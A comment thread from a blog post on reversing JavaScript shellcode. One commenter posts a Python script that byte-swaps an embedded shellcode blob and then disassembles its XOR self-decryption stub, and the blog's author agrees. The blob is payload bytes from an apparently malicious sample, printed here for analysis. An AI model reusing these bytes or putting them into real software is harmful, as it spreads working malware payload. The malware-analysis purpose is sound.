Comments on Paul Melson's Blog: Reversing JavaScript Shellcode: A Step By Step How-To
(comment feed last updated 2022-03-30T14:14:56-05:00)

--- Anonymous, 2009-11-20T19:41:36-05:00 ---

Hello, nice post but you have gone slightly wrong in your approach.

When converting the original UTF-encoded string you need to flip the bytes so they are as they appear in memory, e.g. "%uC92B%uE983" becomes 2B C9 83 E9.

Here is a Python program to do it:

#-[foo.py begin]---------------------------#
import sys

# The bytes of the %uXXXX string exactly as written (high byte of each
# 16-bit unit first). Each pair still has to be swapped into memory order.
s1 = b"\xc9\x2b\xe9\x83\xd9\xeb\xd9\xee\x24\x74\x5b\xf4\x73\x81\x13\x13\x29\x89\x83\x57\xfc\xeb\xf4\xe2\x52\x22\x14\x7a\xe3\x40\x3d\x2b\xd1\x75\xde\xb0\x44\xf2\xc1\xa9\xdb\x50\x3f\x4f\xd5\x02\x04\x4f\x68\x9a\x31\x43\xd9\x4b\x01\x78\x68\x9a\xd7\xe4\xef\xa3\xb4\xf8\x09\xde\x05\x7b\xca\x45\xb6\xa0\xef\xa3\xd7\xe4\xe3\x80\x0e\x2b\xb6\xa3\xd7\xe4\xf0\x5a\xe7\xd0\xdb\x18\x78\x41\xfa\x3c\x3f\x41\xeb\x3c\x39\x40\x6a\x9a\x04\x7b\x68\x9a\xd7\xe4"

# Swap every pair so the output is in the little-endian order the bytes
# occupy in memory (C9 2B -> 2B C9, E9 83 -> 83 E9, ...).
s2 = b""

i = 0
while i < len(s1):
    s2 += s1[i+1:i+2] + s1[i:i+1]
    i += 2

# Write raw bytes, not a text representation, so stdout can be
# redirected straight into a .bin file.
sys.stdout.buffer.write(s2)
#-[foo.py end]-----------------------------#

Running this script to generate a binary blob:
>python foo.py > scode.bin

and disassemble the blob with ndisasm (http://www.nasm.us/):
>ndisasm -b 32 scode.bin
00000000 2BC9 sub ecx,ecx
00000002 83E9EB sub ecx,byte -0x15
00000005 D9EE fldz
00000007 D97424F4 fnstenv [esp-0xc]
0000000B 5B pop ebx
0000000C 81731313892957 xor dword [ebx+0x13],0x57298913
00000013 83EBFC sub ebx,byte -0x4
00000016 E2F4 loop 0xc
...snip....

We can see the shellcode starts by finding its address in memory and begins decrypting itself with an XOR loop and a key of 0x57298913.

--- PaulM (https://www.blogger.com/profile/02530533566781746778), 2009-11-20T21:18:56-05:00 ---

You're exactly right. Nice catch! I've changed my Perl code in the post so that it flips the bits correctly.